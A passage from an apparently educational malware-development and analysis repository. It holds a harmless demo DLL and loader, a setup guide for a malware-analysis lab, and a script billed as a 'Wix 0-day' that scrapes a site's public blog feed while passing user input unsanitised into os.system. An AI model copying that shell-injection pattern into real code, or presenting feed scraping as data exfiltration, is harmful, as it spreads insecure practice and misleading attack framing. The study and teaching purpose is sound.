ease"),document.addEventListener("keyup",(function(o){1!==e&&27===o.keyCode&&t.out()})),document.addEventListener("mousemove",(function(t){1!==e&&(o=t.clientX,n=t.clientY)})),{to:function(o){if(1!==e)t.out();else{if(o.x=o.x||0,o.y=o.y||0,o.element){var n=o.element.getBoundingClientRect();o.x=n.left-20,o.y=n.top-20,o.width=n.width+40,o.height=n.height+40}void 0!==o.width&&void 0!==o.height&&(o.scale=Math.max(Math.min(window.innerWidth/o.width,window.innerHeight/o.height),1)),o.scale>1&&(o.x*=o.scale,o.y*=o.scale,s(o,o.scale),!1!==o.pan&&(i=setTimeout((function(){d=setInterval(c,1e3/60)}),800)))}},out:function(){clearTimeout(i),clearInterval(d),s({x:0,y:0},1),e=1},magnify:function(e){this.to(e)},reset:function(){this.out()},zoomLevel:function(){return e}}}();return function(){return e}})); 5 | -------------------------------------------------------------------------------- /videos/malware-roadmap/slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/malware-roadmap/slides.pdf -------------------------------------------------------------------------------- /videos/pe-deepdive/README.md: -------------------------------------------------------------------------------- 1 | - [video](https://www.youtube.com/watch?v=WIdkwzKV6Zk) 2 | - [pe diagram](https://raw.githubusercontent.com/corkami/pics/master/binary/pe101/pe101-64.png) 3 | - [MessageBox](https://learn.microsoft.com/en-us/dotnet/api/system.windows.forms.messagebox?view=windowsdesktop-7.0) 4 | -------------------------------------------------------------------------------- /videos/pe-deepdive/cosmo.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/pe-deepdive/cosmo.dll -------------------------------------------------------------------------------- /videos/pe-deepdive/example-dll.c: -------------------------------------------------------------------------------- 1 | #include 2 | #pragma comment(lib,"user32.lib"); 3 | 4 | BOOL WINAPI 5 | DllMain (HANDLE hDLL, DWORD dwReason, LPVOID LpReserved) { 6 | switch (dwReason) { 7 | case DLL_PROCESS_ATTACH: 8 | MessageBox(NULL, 9 | "Hello from C0SM0!", 10 | "CosmodiumCS", 11 | MB_ICONERROR | MB_OK); 12 | break; 13 | } 14 | return TRUE; 15 | } 16 | 17 | // cl.exe /D_USRDLL /D_WINDLL example-dll.c /link /DLL /OUT:cosmo.dll 18 | -------------------------------------------------------------------------------- /videos/pe-deepdive/example-exe.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | using namespace std; 5 | 6 | int main(void) { 7 | cout << "Hello, World" << endl; 8 | 9 | HINSTANCE hDll; 10 | hDll = LoadLibrary(TEXT("cosmo.dll")); 11 | 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /videos/pe-deepdive/example-exe.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/pe-deepdive/example-exe.exe -------------------------------------------------------------------------------- /videos/port-knocking/README.md: -------------------------------------------------------------------------------- 1 | - [Video](https://youtube.com/live/u_zp68w9ixk?feature=share) 2 | - [WinSock](https://learn.microsoft.com/en-us/windows/win32/winsock/getting-started-with-winsock) -------------------------------------------------------------------------------- /videos/qemu-malware-lab/README.md: -------------------------------------------------------------------------------- 1 | # QEMU/KVM (Virt Manager) Malware Lab 2 | 3 | ## Install QEMU: 4 | - [Debian](https://christitus.com/vm-setup-in-linux/) 5 | - [Arch](https://computingforgeeks.com/install-kvm-qemu-virt-manager-arch-manjar/) 6 | 7 | ## ISOs: 8 | - [Windows 10](https://www.microsoft.com/en-us/software-download/windows10ISO) 9 | - [Ubuntu 20.04](https://releases.ubuntu.com/20.04/) 10 | 11 | ## FlareVM: 12 | - windows based malware analysis machine 13 | - [spice-guest-tools](https://www.spice-space.org/download.html) 14 | - [FlareVM](https://github.com/mandiant/flare-vm) 15 | - [Tools for Malware Development](https://github.com/CosmodiumCS/Malware-Development/tree/videos/tools-for-malware-development) 16 | 17 | ## REMnux: 18 | - ubunutu based malware analysis machine 19 | 20 | ### credentials 21 | 22 | | Entry | Value | 23 | | --------- | ----------- | 24 | | Full name | REMnux User | 25 | | Username | remnux | 26 | | Password | malware | 27 | 28 | ### install remnux on ubuntu 29 | ```bash 30 | wget https://REMnux.org/remnux-cli 31 | mv remnux-cli remnux 32 | chmod +x remnux 33 | sudo mv remnux /usr/local/bin 34 | sudo apt install -y gnupg 35 | sudo remnux install 36 | # reboot 37 | ``` 38 | 39 | ### blue jupyter 40 | 1. clone the repo 41 | ```bash 42 | git clone --branch PMAT-lab https://github.com/HuskyHacks/blue-jupyter.git && cd blue-jupyter 43 | ``` 44 | 2. run the docker build 45 | ```bash 46 | sudo docker build -t bluejupyter . 47 | ``` 48 | 3. instantiate the docker container 49 | ```bash 50 | sudo docker run -it -p 8888:8888 -v /home/remnux/blue-jupyter/malware-analysis/dropbox/:/src/malware-analysis/dropbox bluejupyter 51 | ``` 52 | 53 | ### inetsim 54 | 1. edit `sudo vim /etc/inetsim/inetsim.conf` 55 | 2. uncomment/comment 56 | ```bash 57 | start_service dns 58 | service_bind_address 0.0.0.0 59 | dns_default_ip 10.0.0.X 60 | ``` 61 | 3. run the following in a terminal 62 | ```bash 63 | sudo systemctl disable systemd-resolved.service 64 | sudo service systemd-resolved stop 65 | ``` 66 | 67 | -------------------------------------------------------------------------------- /videos/qemu-malware-lab/personalize-windows.reg: -------------------------------------------------------------------------------- 1 | Windows Registry Editor Version 5.00 2 | 3 | [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize] 4 | "AppsUseLightTheme"=dword:00000000 ; 5 | "ColorPrevalence"=dword:00000000 ; 6 | "EnableTransparency"=dword:00000001 ; 7 | "SystemUsesLightTheme"=dword:00000000 ; 8 | -------------------------------------------------------------------------------- /videos/tools-for-malware-analysis/README.md: -------------------------------------------------------------------------------- 1 | # Tools for Malware Analysis 2 | -------------------------------------------------------------------------------- /videos/tools-for-malware-development/README.md: -------------------------------------------------------------------------------- 1 | # Tools For Malware Development 2 | 3 | ## Resources 4 | - [tools for malware video](https://youtu.be/thotsOZtmus) 5 | - [setting up development environment video](https://www.youtube.com/live/6zp9xdpyaOk?feature=share) 6 | 7 | ## Ninite: 8 | - Chrome 9 | - Firefox 10 | - Discord 11 | - VLC 12 | - Java Runtime 13 | - .NET Desktop Runtime 14 | - LibreOffice 15 | - Python3 16 | - 7-Zip 17 | 18 | ## Editors 19 | - Visual Studio 20 | - Visual Studio Code 21 | - HxD Hex Editor 22 | 23 | ## Visual Studio Workloads 24 | - Python development 25 | - .NET desktop development 26 | - Desktop development with C++ 27 | - Universal Windows Platform development 28 | - Visual Studio extension development 29 | - Office/SharePoint development 30 | - Linux and embedded development with C++ 31 | 32 | ## Visual Studio Code Extensions 33 | - Python 34 | - Hex Editor 35 | - PowerShell 36 | - C/C++ Extension 37 | - Nim 38 | - YARA 39 | - Vim 40 | 41 | ## Visual Studio Workloads 42 | - Python development 43 | - .NET desktop development 44 | - Desktop development with C++ 45 | - Universal Windows Platform development 46 | - Visual Studio extension development 47 | - Office/SharePoint development 48 | - Linux and embedded development with C++ 49 | -------------------------------------------------------------------------------- /videos/tools-for-malware-development/ninite.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CosmodiumCS/MalwareDNA/8cb57b0e71fff5477c6d1e0e04d9006f40548d37/videos/tools-for-malware-development/ninite.exe -------------------------------------------------------------------------------- /videos/wix-0-day/README.md: -------------------------------------------------------------------------------- 1 | - [video](https://youtu.be/wzfWjTVdvDI) 2 | -------------------------------------------------------------------------------- /videos/wix-0-day/wix.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # exfiltrate blog data from wix sites 3 | # created by cosmo 4 | 5 | # imports 6 | import os 7 | import urllib.request 8 | import xml.etree.ElementTree as ET 9 | 10 | # variables to change 11 | print('[!] URL Format : https://example.com/blog') 12 | input_url = input('[~] Enter Wix Blog URL : ') 13 | url = input_url + '/blog-feed.xml' 14 | file_name = input_url[8:-9] 15 | output_xml = f'{file_name}.xml' 16 | 17 | # output directories 18 | xml_directory = 'xml' 19 | article_directory = 'articles' 20 | path_to_xml = f'{xml_directory}/{output_xml}' 21 | path_to_articles = f'{article_directory}/{file_name}' 22 | os.system(f'mkdir {xml_directory} {article_directory} {path_to_articles}') 23 | 24 | # retrieve data 25 | u = urllib.request.urlopen(url) 26 | data = u.read() 27 | 28 | # # write to xml 29 | with open(f'{path_to_xml}', 'wb') as f: 30 | f.write(data) 31 | 32 | # parse data 33 | tree = ET.parse(path_to_xml) 34 | root = tree.getroot() 35 | 36 | # wix default namespaces 37 | dc_namespace = 'http://purl.org/dc/elements/1.1/' 38 | content_namespace = 'http://purl.org/rss/1.0/modules/content/' 39 | 40 | # iterate through each article 41 | for article in root.findall('.//item'): 42 | 43 | # get values 44 | title = article.find('title').text 45 | description = article.find('description').text 46 | link = article.find('link').text 47 | guid = article.find('guid').text 48 | published = article.find('pubDate').text 49 | thumbnail = article.find('enclosure') 50 | creator = article.find('{' + dc_namespace + '}creator').text 51 | content = article.find('{' + content_namespace + '}encoded').text 52 | 53 | # write content to html, view in browser 54 | print(f'[*] Writing "{title}" to html') 55 | with open(f'{path_to_articles}/{title}.html', 'w') as f: 56 | f.write(content) 57 | 58 | # display values 59 | # print(title) 60 | # print(description) 61 | # print(link) 62 | # print(guid) 63 | # print(published) 64 | # print(thumbnail) 65 | # print(creator) 66 | # print(content) 67 | 68 | # notify user of ouput 69 | print(f'\n[+] XML saved to {path_to_xml}') 70 | print(f'[+] Articles saved to {path_to_articles}/*.html') --------------------------------------------------------------------------------